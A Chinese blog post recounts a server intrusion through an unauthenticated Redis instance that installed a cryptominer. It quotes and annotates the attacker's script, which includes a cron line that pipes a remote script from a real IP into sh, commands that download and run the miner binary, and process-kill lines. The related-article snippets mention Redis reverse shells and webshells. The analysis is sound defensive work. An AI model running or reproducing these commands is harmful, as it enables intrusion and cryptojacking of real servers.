记录一次由Redis漏洞引起的服务器遭遇入侵事件

最新推荐文章于 2023-08-07 19:04:23 发布
最新推荐文章于 2023-08-07 19:04:23 发布
阅读量620 收藏
点赞数
分类专栏: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zh_666888/article/details/78411361
版权

情况概述
服务器CPU长时间100%占用率,带宽用尽,服务器各种服务启动后自动关闭。阿里云提示有挖矿进程,提示发起DDOS攻击。

日志分析

Oct 30 03:50:02 dsdsaa  crond: sendmail: fatal: parameter inet_interfaces: no local interface found for ::1
Oct 30 03:55:01 dsdsaa   systemd: Started Session 447 of user root.
Oct 30 03:55:01 dsdsaa   systemd: Starting Session 447 of user root.
Oct 30 03:55:02 dsdsaa  crond: sendmail: fatal: parameter inet_interfaces: no local interface found for ::1

每隔5分钟,系统会自动执行任务计划,而且有mail发送的程序。所以查看crondtabs –l下的所有任务计划,发现如下:

*/5  *  *  *  * curl –fssl http://218.248.40.228:8443/i.sh?6  | sh

根据地址,果断下载下攻击脚本进行分析如下。

攻击代码分析

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
//重定义了系统全局变量
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh" > /var/spool/cron/root
//向ROOT用户添加任务计划,每5分钟自动从远程服务下载木马脚本并执行
mkdir -p /var/spool/cron/crontabs//创建计划任务目录,并写入执行脚本
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh" > /var/spool/cron/crontabs/root

//如果没有找到/tmp/ddg.2011文件,则自动从远程服务器下载,并赋予执行权限
if [ ! -f "/tmp/ddg.2011" ]; then
    curl -fsSL http://218.248.40.228:8443/2011/ddg.$(uname -m) -o /tmp/ddg.2011  
    //下载对应该系统版本和cpu和木马程序(二进制文件)
fi
chmod +x /tmp/ddg.2011 && /tmp/ddg.2011


#if [ ! -f "/tmp/ss2480.2" ]; then
    #curl -fsSL http://218.248.40.228:8443/ss2480.2 -o /tmp/ss2480.2
#fi
#chmod +x /tmp/ss2480.2 && /tmp/ss2480.2
//查找以下进程并结束运行
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ss22522.1 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ss22522.2 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.1010 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.1021 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2001 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2003 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2004 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2005 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
//挖矿进程的守护进程,默认注释,需要时会自动结束木马进程。
#ps auxf | grep -v grep | grep ddg.2011 || rm -rf /tmp/ddg.2011

漏洞清理:
百度下,发现是由redis无验证漏洞引起的,作者认为redis一般运行在沙盒中,所以Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。
修复建议
自行百度。

到此入侵事件基本解决。建议大家布置相关服务时,首先了解其运行机制和安全规则,再行布置到服务器,或由网络管理员处理。

暗狼天使
关注
专栏目录
redis导致java的cpu过高,redis 漏洞造成服务器入侵-CPU飙升
weixin_39958631的博客
03-12 660
前言前几天在自己服务器上搭了redis,准备想着大展身手一番,昨天使用redis-cli命令的时候,10s后,显示进程已杀死。然后又试了几次,都是一样的结果,10s时间,进程被杀死。这个时候我还没发现事情的严重性。发现问题进程莫名被杀死,可能是cpu被占满,赶紧看了一下cpu。[root@vm_0_13_centos etc]# top果然如此,cpu被莫名的占满了。简单,根据pid杀死进程就行了...
Redis漏洞复现——Redis 4.x/5.x 未授权访问漏洞
Aquarius_ego的博客
03-30 4634
Redis 4.x/5.x 未授权访问漏洞复现
【实战记录记录服务器遭到攻击全过程(Redis漏洞
qq_41997592的博客
02-13 3599
一次面对服务器攻击全过程,由被动到主动!!
redis非授权访问漏洞
weixin_43995159的博客
11-29 1279
复现了三种redis未授权登录的场景。 1.通过redis写入计划任务,取得反弹shell。 2.通过redis写入一句话木马,取得shell。 3.通过redis写入ssh公钥,实现ssh无密码连接。
Redis 漏洞总结
qq_41696518的博客
06-26 3254
其实漏洞的原理无外乎就2点:1. 能连接Redis,这是利用的前提。2. linux一切皆文件,要利用的服务可通过修改文件内容达成。
Redis 拒绝服务漏洞(CVE-2023-28856)修复处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-07 2324
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。官方补丁:https://github.com/redis/redis/,https://github.com/redis/redis/pull/11149,RDB 格式的内容和 AOF 格式的内容,该文件的前半段是 RDB 格式的全量数据,而后半段是 Redis 命令格式的增量数据;丢失数据的概率相对有点大。
redis 写入带宽报警问题解决
厚积薄发的博客
04-04 2428
项目中一直使用celery来做异步任务的执行, broker使用的是redis。 最近每天都会有几次redis(带宽10M)写入带宽超过80%报警, 报警的时候查看redis log 没有发现大量数据写入。经过仔细查看发现大量下面的消息: 这条命令应该是celery在 subscribe result(猜测, 具体逻辑不清楚)。 celery result 里存储了40w+的数据, ...
fatal: parameter inet_interfaces: no local interface found for ::1
贾文超的博客
10-30 1888
CentOS系统中使用 crontab 设置定时任务的时候,查询状态时发现了错误日志。
Redis未授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1372
redis未授权访问漏洞是一个由于redis服务版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。
记录一下五天前的晚上阿里云服务器redis入侵的经历
weixin_43938739的博客
05-17 844
我是个普通大二学生,最近做项目需要部署到服务器上,于是我月初在阿里云买了个小服务器,安装好jdk,tomcat,mysql,redis就没管了,第一次服务器,没什么经验,当时漏洞我没管,打算有空再搞.redis密码也没设置(太蠢了),端口还是默认的6379对外网开放. 就这么相安无事过了7天吧,那天晚上还在打游戏,看到阿里云发来的短信心头一紧,马上上去看,被入侵了,查了一会,发现是挖矿木马,就是如下这种 https://zhuanlan.zhihu.com/p/54610161 我上来就登录redis f
服务器安装redis以及遭遇问题
weixin_45757844的博客
03-01 553
服务器安装redis 安装教程有很多 此参考链接是经过多次尝试后感觉最佳的参照,完美安装! 参考链接:腾讯云服务器上安装Redis_SZ_ChenBolin的博客-CSDN博客_腾讯云服务器安装redis 远程连接redis的过程出现问题 在本地redis desktop manager工具成功连上服务器redis后不超过一分钟,发现整个服务器出现了问题,cpu以及内存使用率达到了100%,通过网上了解到,有许多人在配置redis时由于漏洞遭到入侵! 问题原因: 将redis暴露在公网上,即把redis
查看状态中报错 sendmail: fatal: parameter inet_interfaces: no local interface found for ::1
weixin_44058932的博客
03-29 5921
我在云服务器的CentOS系统中使用 crontab 设置定时任务的时候,查询状态时发现了错误日志,如图: 这段内容表达的是 参数inet_interfaces::1没有找到本地接口,不只是设置定时任务的时候会遇到这个问题,其他关于本地接口使用时都有可能遇到这个问题,下面就是解决方案。 解决方法 在 /etc/postfix目录下,找到 main.cf 文件 。 执行 vim main.cf 找...
Linux CentOS7 命令错误:send-mail: fatal: parameter inet_interfaces: no local interface found for ::1
yy150122的博客
05-17 1754
对于我们学习Linux CentOS7系统,或者许多使用阿里云ESC服务器中的CentOS7系统的初学者来说,在使用mail命令的时候会发现有一种邮件发不出去的问题,以下便是我在学习中遇到的,并且顺利解决的办法: 第一步:查看centos中的postfix日志 输入命令:more /var/log/maillog 如果发现里面为: postfix: fatal: parameter inet_interfaces: no local interface found for ::1 第二部:修改文件配置 输
邮件服务器sendmail与postfix的使用
weixin_47680367的博客
03-01 3134
postfix
send-mail: fatal: parameter inet_interfaces: no local interface found for ::1
xpisme
12-06 5009
1:linux系统 <?php $res = mail ('1067154883@qq.com' , 'text' , 'message' ); var_dump($res);报错:send-mail: fatal: parameter inet_interfaces: no local interface found for ::12:解决方法vim /etc/postfix/main.cf 设置
Linux系统中,当修改~/.bashrc 文件时造成终端中命令无法使用的解决
weixin_45322792的博客
10-29 3488
Linux系统中,当修改 ~/.bashrc 时造成终端中命令无法使用的解决!!! 1.终端中执行下列命令 export PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin 注意:此命令只对当前的session有效。可以通过修改配置文件实现在任何session都有效。见下 2. 修改profile文件 vi /etc/profile 2.1 在文件底端加入: PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin
一次Redis漏洞导致服务器入侵以及解决的过程
orisonchan的博客
08-09 2692
其实这个问题在网上都有说明。然而因为本人是开发出身,运维方面比较欠缺,所以才会遇到此问题,遂记录下来,以此为戒。 被入侵现象 服务器多了很多莫名其妙的操作,根据查看操作记录命令history得到。 服务器会莫名其妙重启。 经常ssh免密登录失效。 apt-get使用报错。 报错log如下: insserv: warning: script 'S01w...
一次Redis未授权访问漏洞入侵分析
java060515的专栏
11-26 1796
0x00 简介 通过之前部署的蜜罐系统,我近日在滴滴云上捕获到了一个通过 Redis 未授权访问漏洞进行入侵的蠕虫样本,该样本的特点是使用 Python 脚本进行横向漏洞扫描,并且具有进程隐藏和卸载某些云上安全产品的功能。 0x01 样本分析 通过蜜罐日志得到攻击者入侵开始于通过 Redis 写 crontab: 命令中的 URL https://pastebin.com/raw/1NtRkBc...
redis 漏洞利用
最新发布
09-30
redis 漏洞利用可以通过redis-rogue-server工具来实现。该工具适用于目标存在Redis未授权访问漏洞时使用,无法对Redis密码进行认证。你可以从https://github.com/n0b0dyCN/redis-rogue-server下载该工具。请注意,Redis官方不建议在Windows下使用Redis,官网上没有Windows版本可以下载。不过,微软团队维护了一个开源的Windows版本,可以在https://github.com/microsoftarchive/redis找到。然而,该版本只支持3.x版本。在Linux下,可以利用redis漏洞进行攻击,例如将shell写入到开机启动项或者写webshell到根目录。请注意,漏洞利用的具体思路与Linux下的redis漏洞利用类似。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值